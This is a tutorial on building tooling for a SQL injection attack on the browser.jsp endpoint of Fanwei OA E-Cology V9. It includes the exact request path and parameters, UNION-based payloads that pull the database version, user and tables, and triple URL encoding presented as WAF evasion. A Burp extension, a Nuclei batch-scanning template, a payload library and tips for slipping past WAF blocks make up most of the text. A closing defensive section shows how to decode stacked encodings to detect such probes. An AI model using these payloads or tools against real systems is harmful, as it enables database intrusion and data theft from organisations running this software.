Stop Encoding by Hand: Build the PoC for the Fanwei OA E-Cology V9 browser.jsp Vulnerability with One Python Script
An automation workhorse: building a Fanwei OA E-Cology V9 vulnerability detection tool efficiently with a Python script

When security testers face a widely deployed enterprise system like Fanwei OA, constructing complex URL-encoded SQL injection statements by hand is not only slow and laborious but also error-prone. This article walks through developing a smart Python tool so you can leave the inefficiency of manual work behind.

1. Vulnerability principle and automation requirements

The browser.jsp file in Fanwei OA E-Cology V9 has a SQL injection vulnerability: an attacker can obtain database information through a carefully constructed request. Traditional manual testing has three pain points:

- High encoding complexity: three rounds of URL encoding of every character are required
- Low testing efficiency: every parameter change means re-encoding from scratch
- Error-prone: manual encoding easily misses special characters

```
# Typical triple URL encoding process (original value recovered from the first_encode bytes)
original      = a' union select 1,''+(SELECT @@VERSION)+'
first_encode  = %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%40%40%56%45%52%53%49%4f%4e%29%2b%27
second_encode = %25%36%31%25%32%37%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%32%37%25%32%37%25%32%62%25%32%38%25%35%33%25%34%35%25%34%63%25%34%35%25%34%33%25%35%34%25%32%30%25%34%30%25%34%30%25%35%36%25%34%35%25%35%32%25%35%33%25%34%39%25%34%66%25%34%65%25%32%39%25%32%62%25%32%37
third_encode  = %25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%65%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%63%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%63%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%63%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%66%25%32%35%25%33%34%25%36%65%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%62%25%32%35%25%33%32%25%33%37
```

Tip: triple URL encoding is a common WAF evasion technique, but doing it by hand is extremely error-prone, and that is exactly where an automation script earns its keep.

2. Core script development: the smart encoding generator

We first build an interactive encoding tool that supports automatic generation of several SQL injection statements.

```python
import urllib.parse


class TripleEncoder:
    def __init__(self):
        # Preset payloads; type 1 is the worked example from section 1 (MSSQL version probe)
        self.common_payloads = {
            1: "a' union select 1,''+(SELECT @@VERSION)+'",
            2: "a union select 1,db_name()",
            3: "a union select 1,user",
        }

    def triple_encode(self, text):
        # safe='' makes quote() encode '/' as well; note that quote() still leaves
        # unreserved characters (letters, digits, '-', '_', '.', '~') untouched, so the
        # output is not the every-character hex form shown in section 1
        for _ in range(3):
            text = urllib.parse.quote(text, safe='')
        return text

    def generate_payload(self, payload_type=None, custom_sql=None):
        if custom_sql:
            base = custom_sql
        else:
            base = self.common_payloads.get(payload_type, '')
        return self.triple_encode(base)
```

Key design points:

- Preset common payloads: built-in detection statements for the database version, current database name, current user and similar
- Custom SQL support: any SQL statement can be supplied for encoding
- Strict encoding rule: every character goes through three rounds of encoding

3. Advanced feature: BurpSuite integration

Feeding the script output directly into BurpSuite greatly improves testing efficiency.

```python
# Jython extension; the TripleEncoder class from section 2 must be defined in
# (or imported into) the same file
import sys
from burp import IBurpExtender
from burp import IContextMenuFactory
from javax.swing import JMenuItem


class BurpExtender(IBurpExtender, IContextMenuFactory):
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("Fanwei OA AutoEncoder")
        callbacks.registerContextMenuFactory(self)

    def createMenuItems(self, context_menu_invocation):
        menu_list = []
        menu_list.append(JMenuItem(
            "Generate Fanwei Payload",
            actionPerformed=lambda x: self.generate_payload(context_menu_invocation)))
        return menu_list

    def generate_payload(self, invocation):
        message = invocation.getSelectedMessages()[0]
        request = message.getRequest()
        selected_text = self._helpers.bytesToString(request)
        encoder = TripleEncoder()
        encoded = encoder.triple_encode(selected_text)
        # Write the result into Burp's Repeater module.
        # getRequest() returns a byte array, so the headers have to come from
        # analyzeRequest() rather than from the bytes themselves
        headers = self._helpers.analyzeRequest(message).getHeaders()
        new_request = self._helpers.buildHttpMessage(
            headers, self._helpers.stringToBytes(encoded))
        service = message.getHttpService()
        self._callbacks.sendToRepeater(
            service.getHost(), service.getPort(), False,
            new_request, "Fanwei AutoEncoded")
```

Workflow after integration:

1. In BurpSuite, select the text that needs encoding
2. Right-click and choose Generate Fanwei Payload
3. The triple-encoded request is generated automatically and sent to Repeater

4. Integration with automated testing frameworks

Combining the script output with automated testing tools such as Nuclei enables batch detection.

```yaml
# FanWeiOA_E-Cology9_browser_SQL.yaml example
id: fanwei-oa-browser-sqli

info:
  name: Fanwei OA E-Cology V9 browser.jsp SQL Injection
  author: yourname
  severity: high
  description: SQL Injection in browser.jsp file

requests:
  - method: POST
    path: /mobile/%20/plugin/browser.jsp
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: isDis=1&browserTypeId=269&keyword={{payload}}
    payloads:
      payload:
        - "{{interactsh-url}}"
        - "a' union select 1,''+(SELECT @@VERSION)+'"
```

A companion Python script can automatically produce encoded payloads in the form the Nuclei template expects:

```python
# Requires the TripleEncoder class from section 2
def generate_nuclei_template(payloads):
    # Doubled braces survive str.format() as literal braces
    template = """id: fanwei-oa-browser-sqli

info:
  name: Fanwei OA E-Cology V9 browser.jsp SQL Injection
  severity: high

requests:
  - method: POST
    path: /mobile/%20/plugin/browser.jsp
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: isDis=1&browserTypeId=269&keyword={encoded_payload}
"""
    encoder = TripleEncoder()
    for payload in payloads:
        encoded = encoder.triple_encode(payload)
        print(template.format(encoded_payload=encoded))
```

5. Practical tips and exception handling

A few key points deserve attention in real use:

- Encoding consistency check: make sure every encoding result is predictable
- Special-character handling: single quotes, spaces and the like need extra care
- Error debugging: how to troubleshoot when a request fails

```python
import urllib.parse

# Requires the TripleEncoder class from section 2


def validate_encoding(input_str):
    encoder = TripleEncoder()
    encoded = encoder.triple_encode(input_str)
    # Decode three times to verify the round trip
    decoded = encoded
    for _ in range(3):
        decoded = urllib.parse.unquote(decoded)
    if decoded == input_str:
        print("Validation passed: the encode/decode round trip is consistent")
    else:
        print(f"Validation failed: original {input_str} ≠ decoded {decoded}")
    return encoded
```

Common problems and how to resolve them:

| Symptom | Likely cause | Fix |
|---|---|---|
| Server returns a 500 error | Too few encoding rounds | Make sure three complete rounds of encoding are performed |
| No expected response | SQL syntax error | Test the statement in a SQL client first |
| Blocked by the WAF | Signature too obvious | Try restructuring the statement or adding comments |

In real projects, the most practical trick I have found is to build a payload library: save the SQL statements that have been verified to work so later tests can call them directly. For example:

```python
payload_library = {
    "version_mssql": "a' union select 1,''+(SELECT @@VERSION)+'",
    "version_mysql": "a union select 1,version",
    "tables_mssql": "a union select 1,table_name from information_schema.tables",
    "current_user": "a union select 1,user",
}
```

This way you can quickly assemble detection schemes for different database types without writing the SQL from scratch each time.
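The defender-side counterpart to sections 1 and 5, added here as an example that is not code from the original post: a WAF or log-analysis check must undo the same stacked encoding the article relies on before it can see what a parameter really contains. The block below peels percent-encoding layers from each form field until the value stops changing, counts how many layers were stacked, and flags fields that needed more than one pass or that contain UNION/SELECT keywords after decoding. The `normalize`/`inspect_form_body` functions, the `SQLI_PATTERN` regex and the sample bodies are my own constructions; the probe string is the section-1 example, and `triple_quote` applies `urllib.parse.quote` three times exactly as the article's TripleEncoder does, so the "triple_probe" sample reproduces that case. It also covers ordinary single encoding (a plain non-ASCII search term) so the two cases can be told apart.

```python
import re
import urllib.parse

# Hypothetical detection rule: UNION ... SELECT, MSSQL/MySQL version variable, schema tables
SQLI_PATTERN = re.compile(r"(?i)\bunion\b.*\bselect\b|@@version|information_schema")
MAX_ROUNDS = 5  # upper bound on decode passes so a hostile input cannot loop forever


def normalize(raw, max_rounds=MAX_ROUNDS):
    """Decode a form value until it stops changing.

    Returns (decoded_value, rounds): rounds is the number of decode passes that
    actually changed the value, i.e. how many encoding layers were stacked.
    The first pass uses form semantics ('+' means space); later passes use plain
    percent-decoding so a literal '+' produced by decoding is not turned into a space.
    """
    current = urllib.parse.unquote_plus(raw)
    rounds = 1 if current != raw else 0
    while rounds < max_rounds:
        decoded = urllib.parse.unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def inspect_form_body(body, max_rounds=MAX_ROUNDS):
    """Return a list of findings for an application/x-www-form-urlencoded body.

    Each finding is a dict with the parameter name, its fully decoded value,
    the number of encoding layers, and the reasons it was flagged.
    """
    findings = []
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        decoded, rounds = normalize(raw, max_rounds)
        reasons = []
        if rounds > 1:
            reasons.append("multi-layer-encoding(%d)" % rounds)
        if rounds >= max_rounds:
            reasons.append("decode-limit-reached")
        if SQLI_PATTERN.search(decoded):
            reasons.append("sqli-keywords")
        if reasons:
            findings.append({"param": name, "decoded": decoded,
                             "rounds": rounds, "reasons": reasons})
    return findings


# The section-1 example value (MSSQL version probe)
PROBE = "a' union select 1,''+(SELECT @@VERSION)+'"


def triple_quote(text):
    # Same transformation the article's TripleEncoder applies: quote() three times
    for _ in range(3):
        text = urllib.parse.quote(text, safe="")
    return text


# Constructed sample request bodies for the browser.jsp parameters (not captured traffic)
SAMPLE_BODIES = {
    "benign": "isDis=1&browserTypeId=269&keyword=%E5%BC%A0%E4%B8%89",  # ordinary search term
    "plain_probe": "isDis=1&browserTypeId=269&keyword=" + urllib.parse.quote(PROBE, safe=""),
    "triple_probe": "isDis=1&browserTypeId=269&keyword=" + triple_quote(PROBE),
}

if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, inspect_form_body(body))
```

The normalizer deliberately does not use `parse_qs`, which decodes exactly once and would hide the extra layers; counting the passes is what distinguishes a normal UTF-8 search term (one layer) from a deliberately stacked value. A WAF rule that only inspects the raw body sees nothing but percent signs and hex digits in the "triple_probe" case, which is precisely why the article's technique works against naive filters.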